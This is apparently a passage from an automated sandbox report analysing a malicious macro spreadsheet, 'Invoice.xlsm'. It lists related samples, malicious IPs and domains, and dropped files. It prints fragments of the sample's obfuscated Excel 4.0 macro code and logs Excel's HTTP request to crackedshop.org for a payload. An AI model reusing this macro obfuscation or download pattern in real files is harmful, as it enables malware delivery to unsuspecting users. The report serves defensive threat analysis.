                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  94.102.59.39Invoice.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • crackedshop.org/cgi-sys/suspendedpage.cgi
                                                                                                                                                  67.207.81.73Invoice.xlsmGet hashmaliciousBrowse

                                                                                                                                                    Domains

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    ascarya.digitalInvoice.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 67.207.81.73

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    DIGITALOCEAN-ASNUSInvoice.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 67.207.81.73
                                                                                                                                                    56449657.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    3762.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    56449657.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    3762.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    55339.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    55339.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    SecuriteInfo.com.Heur.17052.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    44307.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    44307.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 157.230.250.107
                                                                                                                                                    INT-NETWORKSCInvoice.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 94.102.59.39
                                                                                                                                                    yakuza.x86Get hashmaliciousBrowse
                                                                                                                                                    • 94.102.52.200
                                                                                                                                                    yakuza.arm7Get hashmaliciousBrowse
                                                                                                                                                    • 94.102.52.207
                                                                                                                                                    JWCIQ6dmiXGet hashmaliciousBrowse
                                                                                                                                                    • 196.16.9.109
                                                                                                                                                    g3XlmknqG3Get hashmaliciousBrowse
                                                                                                                                                    • 196.16.37.18
                                                                                                                                                    re2.x86Get hashmaliciousBrowse
                                                                                                                                                    • 196.16.25.46
                                                                                                                                                    jew.arm7Get hashmaliciousBrowse
                                                                                                                                                    • 94.102.52.203
                                                                                                                                                    ef5rWphlBV.exeGet hashmaliciousBrowse
                                                                                                                                                    • 89.248.173.187
                                                                                                                                                    6czjyyvzVM.exeGet hashmaliciousBrowse
                                                                                                                                                    • 145.249.106.195
                                                                                                                                                    7NDorjJtM6.exeGet hashmaliciousBrowse
                                                                                                                                                    • 145.249.106.195
                                                                                                                                                    7NDorjJtM6.exeGet hashmaliciousBrowse
                                                                                                                                                    • 145.249.106.195
                                                                                                                                                    Reciept_20438048.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 145.249.106.39
                                                                                                                                                    Reciept_20438048.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 145.249.106.39
                                                                                                                                                    Reciept_20438048.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 145.249.106.39
                                                                                                                                                    7spunOMzSKGet hashmaliciousBrowse
                                                                                                                                                    • 196.16.25.39
                                                                                                                                                    VtlQkDgDjEGet hashmaliciousBrowse
                                                                                                                                                    • 196.16.9.117
                                                                                                                                                    Reciept 5528051.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 145.249.106.39
                                                                                                                                                    Reciept 5528051.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 145.249.106.39
                                                                                                                                                    Reciept 8767556.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 145.249.106.39
                                                                                                                                                    9TW5TjqwON.dllGet hashmaliciousBrowse
                                                                                                                                                    • 80.82.67.127

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\40484C98-D3A3-480D-91A7-412F4910F605
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):140183
                                                                                                                                                    Entropy (8bit):5.357917218722275
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:icQIfgxrBdA3gBwtnQ9DQW+zCA4Ff7nXbovidXiE6LWmE9:KuQ9DQW+zcXfH
                                                                                                                                                    MD5:BEAE9C80966C97CAD37FECAACB55B80A
                                                                                                                                                    SHA1:D08705AE299F59F0033290D5F00A22E8E5260655
                                                                                                                                                    SHA-256:3E00F0607A09972EED9165A44589B27C0DFC69D4B7002B8F8FCD16DA351FCF14
                                                                                                                                                    SHA-512:B7BFC6DDCF0A541467F3DF01E6F56A84DBBE63120C685BF42F16E532346B582B3C2B45B9B4157F5790176F567685D767DD54D2DBC176AC69EB2FE0E4D69E1D7C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T06:11:30">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\28CAD6F4.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 1714 x 241, 8-bit colormap, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14200
                                                                                                                                                    Entropy (8bit):7.855440184003825
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:aeN0UV6iAmjeSvWFL3SdwHEpS4Q24kc49+Tb:jmUxjfC30+kS4Qyob
                                                                                                                                                    MD5:4FE798EE522800691796BC9446918C90
                                                                                                                                                    SHA1:1E01CDE49D0B1B5E2F0DFBAD568DC2ECFBEDEAD3
                                                                                                                                                    SHA-256:EC0BC049D3D30C29567806EB2D555589CD2E1B6B30E9145F77B73A32EC1C1087
                                                                                                                                                    SHA-512:FF968DA2D921DA198E93E82E2FB15583CFA4696455755A6674BC321CD90AE5502ADDC445A0F8C630D9DC780E77EEC6FFC83F55CD2C16DDE7F465BFD0D89BF1AA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .PNG........IHDR..............-......sRGB.........gAMA......a.....PLTE....6...6.....6..a..a..6......a.....a...aa....6....6...66666.6aa..a..6aaa...a....66.....aaaa..aaaa6a....a....66...6.a.....S.b.....6.:...b....f....S.....t:...6t...f..........:6...S:6.:bS......fbS..Sf.t.....:.t..t....bS..tfb..6.f...Sfb.......:.S.....6l...WtRNS........................................................................................c5.....pHYs..........o.d..5.IDATx^.....q....R.A...[.l...'@. .....G..'..;...%..]U]3s....x.s.;.]]..W...............................................................................................................................................~..|....../~...?.{...~fe./...).H....Og1.6g....1T+v..'"h.._(Z;.Zh.bo.....rip..5.>..).h..(F....Z.[.q2B.WZz,...M}@..n$.dO.VK?......YZ...."-o#.K..q..-#5.JT1.K.H..]se.M+.!...R..m{..Q#lO..^ev.R:...0.>.....\....=.>.Op.<..p....qN.Vfq,..\F..6.1..+.. .J....c.4?.Jx...u..X+.E.D...Ko.}...s..G..8I.v...8'B....y..).
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\suspendedpage[1].htm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7624
                                                                                                                                                    Entropy (8bit):5.6428645067252985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJZS:QJvVGaRF8I8Q
                                                                                                                                                    MD5:EB2F7C463E3BEFAD0174E89C10451BCD
                                                                                                                                                    SHA1:80C6604E30655B9BA949210122CCFAF9C7D67766
                                                                                                                                                    SHA-256:5E6DEB3C5AD4E6AB599A3B1A86FCAF25F721C32ED65E83128E9EC0F7ACB1CA0E
                                                                                                                                                    SHA-512:108CF3C4FEE5CC37A16B8A1EF302F66ED6FBE0E5638127689E2F904837688813D8EE424A53A1AABE18034E54B2695852F6DF8B62E792D74B1CD343ECA3A134C1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                                                                                                    C:\Users\user\Desktop\~$Invoice.xlsm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    C:\Users\user\besta.ocx
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7624
                                                                                                                                                    Entropy (8bit):5.6428645067252985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJZS:QJvVGaRF8I8Q
                                                                                                                                                    MD5:EB2F7C463E3BEFAD0174E89C10451BCD
                                                                                                                                                    SHA1:80C6604E30655B9BA949210122CCFAF9C7D67766
                                                                                                                                                    SHA-256:5E6DEB3C5AD4E6AB599A3B1A86FCAF25F721C32ED65E83128E9EC0F7ACB1CA0E
                                                                                                                                                    SHA-512:108CF3C4FEE5CC37A16B8A1EF302F66ED6FBE0E5638127689E2F904837688813D8EE424A53A1AABE18034E54B2695852F6DF8B62E792D74B1CD343ECA3A134C1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.626730610857962
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                                                    • ZIP compressed archive (8000/1) 8.08%
                                                                                                                                                    File name:Invoice.xlsm
                                                                                                                                                    File size:38156
                                                                                                                                                    MD5:41b25400c2b31b922dd090e1251b37b8
                                                                                                                                                    SHA1:b543cbb86a4e50506fb9be2ac455e4e606948d65
                                                                                                                                                    SHA256:734577b2ffb53ddf37d71db650178c94c017f8749a9f9497d2f76abd876418a6
                                                                                                                                                    SHA512:54e9149a93dc7ab334251be6d193c4c08f0b6fd93f717e54873c99eab60d1627f55191e2b4ba5b3e1514eecd0875bf5ce0446cd0730160dcf57743e0e02ae458
                                                                                                                                                    SSDEEP:768:oi/I83SgrjevZCwVIpvxmUxjfC30+kS4QyoO0VIMo+zl:oinZIIpvxXYk4pTVIQ
                                                                                                                                                    File Content Preview:PK..........!.L#li............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "Invoice.xlsm"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    4,7,=CHAR('Ss1'!E45)
11,1,o

                                                                                                                                                    1,5,L
11,1,=CHAR('Ss1'!N43)

                                                                                                                                                    2,0,r
10,4,=CHAR('Ss1'!D39)

                                                                                                                                                    1,8,C
12,3,=CHAR('Ss1'!S46)

                                                                                                                                                    1,3,=FORMULA()=FORMULA()=FORMULA('Buk1'!E11,'Buk2'!B12)=FORMULA('Buk2'!H5,'Buk3'!H3)=FORMULA('Buk3'!C9,'Buk4'!C2)=FORMULA('Buk4'!I8,'Buk5'!F2)=FORMULA('Buk5'!B12,'Buk6'!B10)=FORMULA('Buk6'!G3,'Buk7'!I2)=FORMULA('Buk7'!D13,'Buk1'!A3)=FORMULA('Buk3'!H3&'Ss1'!O6&'Ss1'!D16&'Ss1'!K13&'Ss1'!R12&'Ss1'!R14,D3)=FORMULA('Buk3'!H3&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!B9,D17)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!L5&'Ss1'!R14,D19)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA1"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!O9&'Ss1'!R14,D21)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA2"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!M20&'Ss1'!K23&'Ss1'!N24&'Ss1'!P18&'Ss1'!K18&'Ss1'!R12&'Ss1'!I8&'Ss1'!R14&'Ss1'!R7&'Ss1'!R14,D23)=FORMULA('Buk3'!H3&'Ss1'!J7&'Ss1'!N15&'Ss1'!J7&'Ss1'!M20&'Ss1'!R12&'Ss1'!R16&Ss1br2!Q3&Ss1br2!K10&Ss1br2!I1&'Ss1'!R11&'Ss1'!R5&'Ss1'!R5&'Ss1'!R3&'Ss1'!P2&'Ss1'!O1&'Ss1'!O9&'Ss1'!N5&'Ss1'!F3&'Ss1'!R5&'Ss1'!B9&'Ss1'!I12&'Ss1'!K8&'Ss1'!R7&'Ss1'!R16&'Ss1'!R18&"LKLW"&'Ss1'!R14,D25)=FORMULA('Buk3'!H3&'Ss1'!K54&'Ss1'!K56&'Ss1'!J58&'Ss1'!M52&'Ss1'!K54&'Ss1'!M61&'Ss1'!R12&'Ss1'!R14,D32)

                                                                                                                                                    2,7,=
8,2,=CHAR('Ss1'!G40)

                                                                                                                                                    1,2,A
7,8,=CHAR('Ss1'!J39)

                                                                                                                                                    2,6,=CHAR('Ss1'!R41)
9,1,e

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Dec 2, 2021 07:11:34.309643030 CET49741443192.168.2.367.207.81.73
                                                                                                                                                    Dec 2, 2021 07:11:34.309699059 CET4434974167.207.81.73192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:11:34.309818983 CET49741443192.168.2.367.207.81.73
                                                                                                                                                    Dec 2, 2021 07:11:34.310852051 CET49741443192.168.2.367.207.81.73
                                                                                                                                                    Dec 2, 2021 07:11:34.310882092 CET4434974167.207.81.73192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:13:44.193094015 CET4434974167.207.81.73192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:13:44.200148106 CET49811443192.168.2.367.207.81.73
                                                                                                                                                    Dec 2, 2021 07:13:44.200202942 CET4434981167.207.81.73192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:13:44.200349092 CET49811443192.168.2.367.207.81.73
                                                                                                                                                    Dec 2, 2021 07:13:44.201088905 CET49811443192.168.2.367.207.81.73
                                                                                                                                                    Dec 2, 2021 07:13:44.201113939 CET4434981167.207.81.73192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.269105911 CET4434981167.207.81.73192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.271817923 CET49812443192.168.2.367.207.81.73
                                                                                                                                                    Dec 2, 2021 07:15:55.271907091 CET4434981267.207.81.73192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.272059917 CET49812443192.168.2.367.207.81.73
                                                                                                                                                    Dec 2, 2021 07:15:55.272696972 CET49812443192.168.2.367.207.81.73
                                                                                                                                                    Dec 2, 2021 07:15:55.272744894 CET4434981267.207.81.73192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.272859097 CET49812443192.168.2.367.207.81.73
                                                                                                                                                    Dec 2, 2021 07:15:55.375144958 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:15:55.401195049 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.401330948 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:15:55.401859999 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:15:55.428767920 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.429369926 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.429493904 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:15:55.434375048 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:15:55.480427980 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.480596066 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:15:55.497607946 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.497651100 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.497687101 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.497720957 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:15:55.497733116 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.497772932 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.497792006 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:15:55.497811079 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.497868061 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:15:55.497917891 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:15:55.498986006 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.499104023 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:16:00.504283905 CET804981394.102.59.39192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:16:00.504414082 CET4981380192.168.2.394.102.59.39
                                                                                                                                                    Dec 2, 2021 07:16:17.484690905 CET4981380192.168.2.394.102.59.39

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Dec 2, 2021 07:11:34.287858009 CET5415453192.168.2.38.8.8.8
                                                                                                                                                    Dec 2, 2021 07:11:34.306016922 CET53541548.8.8.8192.168.2.3
                                                                                                                                                    Dec 2, 2021 07:15:55.350747108 CET4955953192.168.2.38.8.8.8
                                                                                                                                                    Dec 2, 2021 07:15:55.372935057 CET53495598.8.8.8192.168.2.3

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Dec 2, 2021 07:11:34.287858009 CET192.168.2.38.8.8.80xec1fStandard query (0)ascarya.digitalA (IP address)IN (0x0001)
                                                                                                                                                    Dec 2, 2021 07:15:55.350747108 CET192.168.2.38.8.8.80xae1aStandard query (0)crackedshop.orgA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Dec 2, 2021 07:11:34.306016922 CET8.8.8.8192.168.2.30xec1fNo error (0)ascarya.digital67.207.81.73A (IP address)IN (0x0001)
                                                                                                                                                    Dec 2, 2021 07:15:55.372935057 CET8.8.8.8192.168.2.30xae1aNo error (0)crackedshop.org94.102.59.39A (IP address)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • crackedshop.org

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.34981394.102.59.3980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Dec 2, 2021 07:15:55.401859999 CET5658OUTGET /9/q080U0ARYYL/ HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: crackedshop.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Dec 2, 2021 07:15:55.429369926 CET5658INHTTP/1.1 302 Found
                                                                                                                                                    Date: Thu, 02 Dec 2021 06:15:55 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Location: http://crackedshop.org/cgi-sys/suspendedpage.cgi
                                                                                                                                                    Content-Length: 232
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 72 61 63 6b 65 64 73 68 6f 70 2e 6f 72 67 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://crackedshop.org/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                                                                                                                                                    Dec 2, 2021 07:15:55.434375048 CET5659OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: crackedshop.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Dec 2, 2021 07:15:55.480427980 CET5659INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 02 Dec 2021 06:15:55 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Keep-Alive: timeout=5, max=99
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Content-Type: text/html
